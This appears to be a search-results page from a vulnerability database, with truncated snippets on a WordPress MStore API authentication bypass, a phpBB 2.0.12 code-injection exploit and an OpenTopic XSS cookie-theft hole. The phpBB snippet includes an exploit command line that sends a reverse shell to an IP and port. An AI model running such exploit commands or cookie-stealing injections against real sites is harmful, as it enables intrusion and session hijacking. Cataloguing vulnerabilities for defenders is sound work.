3 matches found
CVE-2021-24148
A business logic issue in the MStore API WordPress plugin, versions before 3.2.0, had an authentication bypass with Sign In With Apple allowing unauthenticated users to recover an authentication cookie with only an email address...
phpbb <= 2.0.12 uid vuln + admin_styles.php php code injection exploit
phpbbexp.exe http://site.com/phpbb/ backshell ip backshell port coded by Malloc0 Wicked Attitude tested on phpbb 2.0.11 C:dtcphpbbexp.exe http://site.com/phpbb2/ 13.37.13.37 8888 nom du cookie recuperer : phpbb2mysql SESSION ID recuperЪ ... 06bef5092f9d369f13107684f63a3499...
OpenTopic security hole
Informations : °°°°°°°°°°°°°° Product : OpenTopic Website : http://www.infopop.com Version : 2.3.1 Problem : XSS script injection - Cookies recovery Location/Exploit : °°°°°°°°°°°°°°°°°° The XSS hole is in the private messages area http://target/OpenTopic?a=ugtpc . XSS to get cookie :...